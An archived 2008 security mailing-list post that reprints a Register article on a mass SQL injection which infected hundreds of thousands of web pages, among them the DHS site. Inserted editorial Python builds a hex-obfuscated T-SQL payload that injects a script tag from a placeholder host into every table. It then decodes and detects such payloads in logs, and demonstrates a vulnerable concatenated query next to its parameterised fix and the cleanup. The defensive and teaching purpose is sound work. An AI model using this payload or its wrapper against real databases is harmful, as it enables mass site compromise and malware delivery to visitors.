[ISN] Department of Homeland Security website hacked!

From: InfoSec News (alerts@private)
Date: Mon Apr 28 2008 - 23:52:59 PDT


http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/

By Dan Goodin
The Register
25th April 2008

The sophisticated mass infection that's injecting attack code into 
hundreds of thousands of reputable web pages is growing and has even 
infiltrated the website of the Department of Homeland Security.

While so-called SQL injections are nothing new, this latest attack, 
which we reported earlier, is notable for its ability to infect huge 
numbers of pages using only a single string of text. At time of writing, 
three Google searches showed almost 520,000 pages containing the 
infection string, though the exact number changes almost constantly. As 
the screenshot below shows, even the DHS, which is responsible for 
protecting US infrastructure against cyber attacks, wasn't immune. Other 
hacked sites include those belonging to the United Nations and the UK 
Civil Service.

The attack causes infected sites to redirect visitors to destinations 
that attempt to install malware on vulnerable machines. At time of 
writing, the malicious payloads attacked vulnerabilities that already 
have been patched. And in any case all three of the redirection sites 
were down, possibly because they were unable to handle the demand. But 
should the attackers get their hands on a newer exploit - say, one 
targeting a zero-day vulnerability in QuickTime - it would be relatively 
easy for them to swap out the payload.

One reason the infection has spread so widely is that the attackers have 
managed to find a single attack string that seems to work on tens of 
thousands of different sites. Most web applications are custom-built 
for a particular site, so attackers likewise have to custom-design 
attack parameters to exploit each site's weaknesses. Not so here.

"These guys look like they've found a methodology to get a successful 
SQL injection generically across [many] websites," said Jeremiah 
Grossman, CTO of WhiteHat Security, which helps companies secure web 
applications. "That right there is like a skeleton key."

The script is also notable for its ability to slip past web application 
defenses. The SQL query is mostly hex-encoded, which obscures it from 
filters, at least on sites that use Microsoft SQL Server. MySQL and 
PostgreSQL are less easily fooled, according to researcher Ronald van 
den Heetkamp.
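To make the obfuscation concrete, here is an added example of how a 
hex-encoded T-SQL injection looks in a web server log and how to decode 
it during triage. This is editorial example code, not the attack string 
reported above or anything from the sites involved. The decoded payload 
is a constructed stand-in in the shape such strings take (a cursor over 
the system catalog, which is how one string fits any schema), the log 
lines are constructed, and the host malicious.example is a placeholder.

```python
"""Spot and decode hex-obfuscated T-SQL injection strings in web server logs."""
import re
from typing import Optional
from urllib.parse import quote, unquote

# Constructed stand-in for the decoded payload: walks every user table's text
# columns via the system catalog and appends a script tag to each value.  The
# host name is a placeholder; this is not the string used in the real attack.
INJECTED_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name "
    "FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=\"http://malicious.example/x.js\"></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def build_attack_query(sql: str) -> str:
    """Wrap SQL the way the attack string did: hex-encode it, CAST it back to
    text inside the database, and EXEC the result."""
    hex_payload = sql.encode("latin-1").hex().upper()
    return ("id=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x" + hex_payload
            + " AS VARCHAR(4000));EXEC(@S);--")


# Constructed W3C-style log lines: date time method uri-stem uri-query status.
SAMPLE_LOG = [
    "2008-04-25 10:11:12 GET /news/default.asp id=17&page=2 200",
    "2008-04-25 10:11:13 GET /news/default.asp "
    + quote(build_attack_query(INJECTED_SQL), safe="=;()@,-") + " 200",
    "2008-04-25 10:11:14 GET /about.asp - 200",
]

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{8,})")
# CAST(0x... AS VARCHAR) followed by EXEC( is the T-SQL idiom that lets SQL
# appear in the request as nothing but a run of hex digits.
TSQL_HEX_EXEC = re.compile(
    r"CAST\s*\(\s*0x[0-9A-Fa-f]+\s+AS\s+N?VARCHAR.*?EXEC\s*\(",
    re.IGNORECASE | re.DOTALL)
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=[\"']?([^\"'>\s]+)", re.IGNORECASE)


def decode_hex_literal(hex_digits: str) -> str:
    """Decode a T-SQL 0x literal; NVARCHAR payloads arrive as UTF-16LE."""
    if len(hex_digits) % 2:            # a stray nibble cannot be part of a byte string
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def scan_query(query_string: str) -> Optional[dict]:
    """Return the decoded SQL, payloads and injected script URLs if the query
    string carries a hex-encoded EXEC injection, else None."""
    decoded = unquote(query_string)
    if not TSQL_HEX_EXEC.search(decoded):
        return None
    payloads = [decode_hex_literal(h) for h in HEX_LITERAL.findall(decoded)]
    return {"query": decoded, "payloads": payloads,
            "script_sources": [s for p in payloads for s in SCRIPT_SRC.findall(p)]}


def scan_log(lines) -> list:
    """Apply scan_query to the uri-query field of each log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[4] == "-":
            continue
        result = scan_query(fields[4])
        if result:
            hits.append({"time": fields[0] + " " + fields[1],
                         "path": fields[3], **result})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["path"], "injects", hit["script_sources"])
        print("  decoded payload starts:", hit["payloads"][0][:70])
```

The detector keys on the CAST/EXEC idiom rather than on the hex itself, 
because hex literals alone are common and legitimate. That idiom is 
specific to T-SQL; a detector for a MySQL-backed site would have to look 
for 0x literals or UNHEX() used in string positions instead, and 
PostgreSQL does not parse 0x literals at all.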

Sites are getting pwned because they fail to sanitize user-supplied 
data. DHS security pros scrubbed the page clean the same day it got 
infected and took steps to make sure the same attack couldn't succeed 
against other parts of the DHS website, spokeswoman Amy Kudwa said.

"We're well aware of the fact that intrusions happen all the time and 
that's why we are doing all that we are to secure the .gov domain," she 
said.

In a recent interview with The Register, Greg Garcia, the DHS's 
assistant secretary for cybersecurity and telecommunications said: "our 
networks really are only as strong as the weakest link and because we 
are so interconnected, if there are companies that are not doing what 
they need to do to protect their networks, that in turn may be 
jeopardizing the security of companies that very well may be doing the 
right thing."

While the number of pages that have been infected is high, not all are 
able to launch an attack once a user visits them, according to Roger 
Thompson, chief research officer of anti-virus provider AVG.

"Very often they're on a page but the stuff doesn't actually fire when 
you get there," he said. "This is not a cunning, premeditated task; it's 
just a blast. They're just planting the stuff where they can and the 
result is a lot of pages [that] don't do anything."

But webmasters should not be complacent about removing the injected code 
from their sites and fixing buggy web apps to make sure more don't 
spring up.

"It's the cleanup effort that's just going to be monstrous," said 
Grossman, who said affected companies will have to either remove each 
overwritten table record one at a time, or revert to a recent backup. 
"Either way, it's going to take forever."
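The root cause (unsanitized input concatenated into SQL) and the cleanup 
Grossman describes are shown together in the following added example, 
which is editorial code and not from any of the affected sites. It runs 
against an in-memory SQLite table that stands in for a CMS page table; 
the rows and the host malicious.example are constructed placeholders. 
The vulnerable lookup uses executescript() so that SQLite runs stacked 
statements the way the Microsoft SQL stack behind the injected sites 
did.

```python
"""A string-built query beside its parameterised form, plus the cleanup
query, on an in-memory SQLite table standing in for a site's page table."""
import sqlite3

# Constructed sample rows; the host in INJECTED_TAG is a placeholder.
SCHEMA = "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
ROWS = [(1, "Home", "<p>Welcome</p>"), (2, "About", "<p>About us</p>")]
INJECTED_TAG = '<script src="http://malicious.example/x.js"></script>'
# What an attacker sends in place of a numeric page id: a stacked UPDATE
# that appends the tag to every row rather than replacing the content.
ATTACK = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, page_id: str) -> None:
    """Builds the statement by concatenation.  executescript() is used so
    that SQLite runs stacked statements as MS SQL does; sqlite3's execute()
    happens to refuse a second statement, but that is a driver property,
    not a defence the application can rely on."""
    conn.executescript("SELECT title FROM pages WHERE id = " + page_id)


def lookup_parameterised(conn: sqlite3.Connection, page_id: str) -> list:
    """Binds the value: whatever it contains is compared against id as data,
    never parsed as SQL."""
    return conn.execute("SELECT title FROM pages WHERE id = ?",
                        (page_id,)).fetchall()


def infected_rows(conn: sqlite3.Connection) -> list:
    """Ids of rows whose body carries a script tag."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM pages WHERE body LIKE ? ORDER BY id", ("%<script%",))]


def scrub_injected_tag(conn: sqlite3.Connection, tag: str) -> int:
    """The cleanup Grossman describes, done in one pass over the column rather
    than record by record; returns the number of rows repaired.  REPLACE
    removes only the exact tag, so the original content survives."""
    cur = conn.execute(
        "UPDATE pages SET body = REPLACE(body, ?, '') WHERE body LIKE ?",
        (tag, "%" + tag + "%"))
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    """Same attacker input through both lookups, then the cleanup."""
    vuln = fresh_db()
    lookup_vulnerable(vuln, ATTACK)
    safe = fresh_db()
    safe_rows = lookup_parameterised(safe, ATTACK)
    return {
        "vulnerable_infected": infected_rows(vuln),   # every row rewritten
        "safe_rows": safe_rows,                        # no such id, no damage
        "safe_infected": infected_rows(safe),
        "repaired": scrub_injected_tag(vuln, INJECTED_TAG),
        "after_cleanup": infected_rows(vuln),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The one-pass REPLACE is safe only when the injected tag is known exactly 
and the columns are plain text; a column that held the tag legitimately 
(a security blog quoting it, say) would be scrubbed too, which is one 
reason a recent backup can be the better option.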

Security workers better get cracking.


_______________________________________________      
Subscribe to the InfoSec News RSS Feed
http://www.infosecnews.org/isn.rss



This archive was generated by hypermail 2.1.3 : Tue Apr 29 2008 - 00:05:30 PDT